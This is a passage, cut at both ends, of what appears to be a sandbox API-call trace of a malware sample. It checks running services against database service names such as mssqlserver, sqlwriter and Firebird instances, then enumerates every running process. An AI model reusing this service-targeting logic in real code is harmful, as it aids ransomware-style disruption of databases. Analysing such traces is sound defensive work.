(lpString1="mssqlserver", lpString2="Spooler") returned -1 [0211.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0211.054] lstrlenW (lpString="sppsvc") returned 6 [0211.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0211.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0211.054] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0211.054] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0211.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0211.054] lstrlenW (lpString="SSDPSRV") returned 7 [0211.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0211.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0211.054] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0211.054] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0211.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3dc [0211.058] Process32FirstW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.059] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.060] lstrlenW (lpString="System") returned 6 [0211.060] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.060] lstrlenW (lpString="smss.exe") returned 8 [0211.061] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.061] lstrlenW (lpString="csrss.exe") returned 9 [0211.061] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.062] lstrlenW (lpString="wininit.exe") returned 11 [0211.062] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.063] lstrlenW (lpString="csrss.exe") returned 9 [0211.063] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.064] lstrlenW (lpString="winlogon.exe") returned 12 [0211.064] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.064] lstrlenW (lpString="services.exe") returned 12 [0211.064] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.065] lstrlenW (lpString="lsass.exe") returned 9 [0211.065] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.066] lstrlenW (lpString="svchost.exe") returned 11 [0211.066] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0211.067] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0211.067] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0211.067] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0211.067] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.068] lstrlenW (lpString="svchost.exe") returned 11 [0211.068] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.069] lstrlenW (lpString="dwm.exe") returned 7 [0211.069] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.070] lstrlenW (lpString="svchost.exe") returned 11 [0211.070] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.070] lstrlenW (lpString="svchost.exe") returned 11 [0211.070] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.071] lstrlenW (lpString="svchost.exe") returned 11 [0211.071] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.072] lstrlenW (lpString="svchost.exe") returned 11 [0211.072] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.074] lstrlenW (lpString="svchost.exe") returned 11 [0211.074] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.074] lstrlenW (lpString="svchost.exe") returned 11 [0211.075] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.075] lstrlenW (lpString="svchost.exe") returned 11 [0211.076] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.077] lstrlenW (lpString="svchost.exe") returned 11 [0211.077] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.077] lstrlenW (lpString="svchost.exe") returned 11 [0211.078] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.078] lstrlenW (lpString="spoolsv.exe") returned 11 [0211.078] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.079] lstrlenW (lpString="svchost.exe") returned 11 [0211.079] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.080] lstrlenW (lpString="svchost.exe") returned 11 [0211.080] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.080] lstrlenW (lpString="audiodg.exe") returned 11 [0211.080] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0211.081] lstrlenW (lpString="sihost.exe") returned 10 [0211.081] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.082] lstrlenW (lpString="svchost.exe") returned 11 [0211.082] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.083] lstrlenW (lpString="taskhostw.exe") returned 13 [0211.083] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.083] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0211.083] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0211.084] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0211.084] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.085] lstrlenW (lpString="explorer.exe") returned 12 [0211.085] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0211.086] lstrlenW (lpString="Memory Compression") returned 18 [0211.086] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0211.086] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0211.086] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0211.087] lstrlenW (lpString="SearchUI.exe") returned 12 [0211.087] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0211.088] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0211.089] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.089] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0211.089] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0211.090] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0211.090] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0211.091] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0211.091] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.091] lstrlenW (lpString="conhost.exe") returned 11 [0211.092] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0211.092] lstrlenW (lpString="roof competitive.exe") returned 20 [0211.092] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0211.093] lstrlenW (lpString="trustees.exe") returned 12 [0211.093] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0211.094] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0211.094] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0211.094] lstrlenW (lpString="isbn.exe") returned 8 [0211.094] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0211.095] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0211.095] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0211.096] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0211.096] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0211.097] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0211.097] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0211.097] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0211.097] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0211.098] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0211.098] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0211.099] lstrlenW (lpString="playstation iraq.exe") returned 20 [0211.099] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0211.100] lstrlenW (lpString="harbor.exe") returned 10 [0211.100] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0211.100] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0211.100] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0211.101] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0211.101] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0211.102] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0211.102] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0211.103] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0211.103] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0211.104] lstrlenW (lpString="larent.exe") returned 10 [0211.104] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0211.105] lstrlenW (lpString="stereo.exe") returned 10 [0211.105] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0211.105] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0211.106] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0211.106] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0211.106] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0211.107] lstrlenW (lpString="state.exe") returned 9 [0211.107] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0211.108] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0211.108] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.109] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0211.109] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.110] lstrlenW (lpString="taskhostw.exe") returned 13 [0211.110] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.110] lstrlenW (lpString="sppsvc.exe") returned 10 [0211.110] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.120] lstrlenW (lpString="svchost.exe") returned 11 [0211.120] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0211.121] lstrlenW (lpString="Pg.exe") returned 6 [0211.121] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, 